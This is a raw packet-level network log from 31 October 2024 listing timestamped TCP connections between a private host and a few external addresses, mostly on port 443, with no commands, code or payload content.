Oct 31, 2024 19:20:46.467489004 CET	443	51482	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.467499971 CET	51482	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.467504978 CET	443	51482	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.470732927 CET	51488	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.470752954 CET	443	51488	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.470907927 CET	51488	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.471065998 CET	51488	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.471080065 CET	443	51488	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.512522936 CET	443	51483	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.512588978 CET	443	51483	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.512830019 CET	51483	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.512876034 CET	51483	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.512882948 CET	443	51483	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.512963057 CET	51483	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.512968063 CET	443	51483	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.516129971 CET	51489	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.516156912 CET	443	51489	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.516231060 CET	51489	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.516379118 CET	51489	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.516391039 CET	443	51489	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.519622087 CET	443	51484	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.519689083 CET	443	51484	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.519809961 CET	51484	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.520087004 CET	51484	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.520087004 CET	51484	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.520097017 CET	443	51484	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.520106077 CET	443	51484	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.523550987 CET	51490	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.523565054 CET	443	51490	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.523657084 CET	51490	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.523803949 CET	51490	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.523817062 CET	443	51490	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.644177914 CET	443	51485	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.644391060 CET	443	51485	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.644442081 CET	443	51485	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.644511938 CET	51485	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.644607067 CET	51485	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.644864082 CET	51485	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.644864082 CET	51485	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.644892931 CET	443	51485	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.644906998 CET	443	51485	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.647747040 CET	51491	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.647775888 CET	443	51491	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:46.647890091 CET	51491	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.648184061 CET	51491	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:46.648194075 CET	443	51491	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.186748981 CET	443	51487	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.187519073 CET	51487	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.187536001 CET	443	51487	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.188194036 CET	51487	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.188199997 CET	443	51487	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.212384939 CET	443	51488	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.212903023 CET	51488	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.212940931 CET	443	51488	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.213393927 CET	51488	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.213399887 CET	443	51488	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.263109922 CET	443	51489	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.263887882 CET	51489	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.263915062 CET	443	51489	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.264527082 CET	51489	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.264533043 CET	443	51489	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.292129993 CET	443	51490	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.292761087 CET	51490	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.292790890 CET	443	51490	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.293420076 CET	51490	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.293425083 CET	443	51490	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.316404104 CET	443	51487	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.316473961 CET	443	51487	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.316565037 CET	51487	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.316878080 CET	51487	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.316878080 CET	51487	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.316907883 CET	443	51487	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.316920042 CET	443	51487	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.320497990 CET	51492	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.320538998 CET	443	51492	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.320655107 CET	51492	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.320817947 CET	51492	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.320833921 CET	443	51492	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.345217943 CET	443	51488	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.345743895 CET	443	51488	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.345810890 CET	51488	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.345825911 CET	443	51488	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.345855951 CET	443	51488	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.345907927 CET	51488	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.345946074 CET	51488	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.345952988 CET	443	51488	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.345964909 CET	51488	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.345969915 CET	443	51488	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.349188089 CET	51493	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.349229097 CET	443	51493	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.349311113 CET	51493	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.349474907 CET	51493	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.349488020 CET	443	51493	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.386056900 CET	443	51491	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.386897087 CET	51491	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.386921883 CET	443	51491	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.387618065 CET	51491	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.387629032 CET	443	51491	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.396020889 CET	443	51489	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.396089077 CET	443	51489	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.396152020 CET	51489	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.396426916 CET	51489	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.396434069 CET	443	51489	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.396445036 CET	51489	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.396450043 CET	443	51489	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.399943113 CET	51494	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.399960041 CET	443	51494	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.400053978 CET	51494	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.400244951 CET	51494	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.400257111 CET	443	51494	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.410887957 CET	51248	443	192.168.2.4	142.250.186.33
Oct 31, 2024 19:20:47.410954952 CET	443	51248	142.250.186.33	192.168.2.4
Oct 31, 2024 19:20:47.411030054 CET	51248	443	192.168.2.4	142.250.186.33
Oct 31, 2024 19:20:47.429028988 CET	443	51490	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.429059029 CET	443	51490	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.429101944 CET	443	51490	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.429150105 CET	51490	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.429151058 CET	51490	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.429397106 CET	51490	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.429405928 CET	443	51490	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.429428101 CET	51490	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.429435968 CET	443	51490	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.432795048 CET	51496	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.432821989 CET	443	51496	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.432908058 CET	51496	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.433058023 CET	51496	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.433079004 CET	443	51496	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.514419079 CET	443	51491	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.514547110 CET	443	51491	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.514596939 CET	51491	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.514760971 CET	51491	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.514774084 CET	443	51491	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.514782906 CET	51491	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.514787912 CET	443	51491	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.518342018 CET	51497	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.518371105 CET	443	51497	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:47.518431902 CET	51497	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.518646002 CET	51497	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:47.518656969 CET	443	51497	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.057504892 CET	443	51492	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.060657024 CET	51492	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.060679913 CET	443	51492	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.061144114 CET	51492	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.061148882 CET	443	51492	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.079263926 CET	443	51493	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.080647945 CET	51493	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.080677986 CET	443	51493	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.082158089 CET	51493	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.082164049 CET	443	51493	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.132697105 CET	443	51494	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.136662960 CET	51494	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.136677980 CET	443	51494	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.137159109 CET	51494	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.137164116 CET	443	51494	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.169702053 CET	443	51496	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.172650099 CET	51496	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.172668934 CET	443	51496	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.173182964 CET	51496	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.173191071 CET	443	51496	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.195473909 CET	443	51492	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.195549965 CET	443	51492	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.195688009 CET	51492	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.196003914 CET	51492	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.196003914 CET	51492	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.196021080 CET	443	51492	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.196031094 CET	443	51492	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.198966980 CET	51498	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.199004889 CET	443	51498	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.199090958 CET	51498	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.199239016 CET	51498	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.199254990 CET	443	51498	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.207674980 CET	443	51493	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.207880020 CET	443	51493	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.207964897 CET	51493	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.208190918 CET	51493	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.208203077 CET	443	51493	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.208214045 CET	51493	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.208219051 CET	443	51493	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.210738897 CET	51499	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.210768938 CET	443	51499	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.210846901 CET	51499	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.210987091 CET	51499	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.210998058 CET	443	51499	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.260305882 CET	443	51497	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.262510061 CET	443	51494	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.262538910 CET	443	51494	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.262587070 CET	443	51494	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.262674093 CET	51494	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.262695074 CET	51494	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.273605108 CET	51494	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.273619890 CET	443	51494	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.273632050 CET	51494	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.273637056 CET	443	51494	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.273929119 CET	51497	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.273953915 CET	443	51497	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.274482012 CET	51497	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.274487972 CET	443	51497	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.277882099 CET	51500	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.277910948 CET	443	51500	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.278060913 CET	51500	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.278167963 CET	51500	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.278188944 CET	443	51500	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.299485922 CET	443	51496	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.299560070 CET	443	51496	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.299643993 CET	51496	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.299920082 CET	51496	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.299920082 CET	51496	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.299935102 CET	443	51496	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.299945116 CET	443	51496	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.303149939 CET	51501	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.303184986 CET	443	51501	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.307573080 CET	51501	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.307790041 CET	51501	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.307802916 CET	443	51501	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.400497913 CET	443	51497	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.400806904 CET	443	51497	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.400912046 CET	51497	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.400944948 CET	51497	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.400965929 CET	443	51497	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.400979996 CET	51497	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.400986910 CET	443	51497	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.404078960 CET	51502	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.404114962 CET	443	51502	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.404211044 CET	51502	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.404359102 CET	51502	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.404372931 CET	443	51502	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.567055941 CET	49738	80	192.168.2.4	160.153.155.187
Oct 31, 2024 19:20:48.571906090 CET	80	49738	160.153.155.187	192.168.2.4
Oct 31, 2024 19:20:48.944175005 CET	443	51498	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.950083971 CET	443	51499	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.975296021 CET	51498	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.975318909 CET	443	51498	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.975775957 CET	51498	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.975780964 CET	443	51498	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.976015091 CET	51499	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.976036072 CET	443	51499	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:48.976372957 CET	51499	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:48.976378918 CET	443	51499	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.009190083 CET	443	51500	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.009747982 CET	51500	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.009779930 CET	443	51500	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.010212898 CET	51500	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.010236025 CET	443	51500	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.073110104 CET	443	51501	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.073765039 CET	51501	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.073779106 CET	443	51501	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.074425936 CET	51501	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.074440956 CET	443	51501	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.125376940 CET	443	51498	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.125396013 CET	443	51498	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.125468969 CET	443	51498	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.125571966 CET	51498	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.125571966 CET	51498	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.125869036 CET	443	51499	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.125873089 CET	51498	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.125873089 CET	51498	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.125894070 CET	443	51498	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.125904083 CET	443	51498	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.125926018 CET	443	51499	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.125977039 CET	51499	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.126111031 CET	51499	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.126131058 CET	443	51499	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.126142979 CET	51499	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.126151085 CET	443	51499	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.129199982 CET	51504	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.129235029 CET	443	51504	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.129251957 CET	51503	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.129283905 CET	443	51503	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.129308939 CET	51504	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.129437923 CET	51503	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.129487991 CET	51504	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.129498005 CET	443	51504	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.129973888 CET	51503	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.129987955 CET	443	51503	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.141428947 CET	443	51500	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.141449928 CET	443	51500	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.141503096 CET	443	51500	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.141534090 CET	51500	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.141618013 CET	51500	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.141830921 CET	51500	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.141830921 CET	51500	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.141850948 CET	443	51500	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.141861916 CET	443	51500	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.144884109 CET	51505	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.144915104 CET	443	51505	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.145056009 CET	51505	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.145330906 CET	51505	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.145347118 CET	443	51505	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.146009922 CET	443	51502	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.146950960 CET	51502	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.146961927 CET	443	51502	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.147466898 CET	51502	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.147473097 CET	443	51502	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.208362103 CET	443	51501	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.208389997 CET	443	51501	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.208475113 CET	443	51501	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.208906889 CET	51501	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.208906889 CET	51501	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.208906889 CET	51501	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.212009907 CET	51506	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.212038994 CET	443	51506	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.212089062 CET	51501	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.212100983 CET	443	51501	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.212131023 CET	51506	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.212332964 CET	51506	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.212342024 CET	443	51506	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.278424025 CET	443	51502	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.278449059 CET	443	51502	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.278631926 CET	51502	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.278650999 CET	443	51502	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.278881073 CET	51502	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.278887987 CET	443	51502	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.278904915 CET	443	51502	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.278906107 CET	51502	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.278927088 CET	443	51502	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.281734943 CET	51507	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.281793118 CET	443	51507	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.281877995 CET	51507	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.282037020 CET	51507	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.282059908 CET	443	51507	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.862020969 CET	443	51504	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.862637043 CET	51504	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.862652063 CET	443	51504	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.863146067 CET	51504	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.863151073 CET	443	51504	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.871403933 CET	443	51503	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.871840954 CET	51503	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.871855021 CET	443	51503	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.872303963 CET	51503	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.872309923 CET	443	51503	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.872314930 CET	443	51505	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.872562885 CET	51505	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.872590065 CET	443	51505	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.872911930 CET	51505	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.872916937 CET	443	51505	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.939889908 CET	443	51506	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.940547943 CET	51506	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.940567970 CET	443	51506	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.941059113 CET	51506	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.941065073 CET	443	51506	13.107.246.45	192.168.2.4
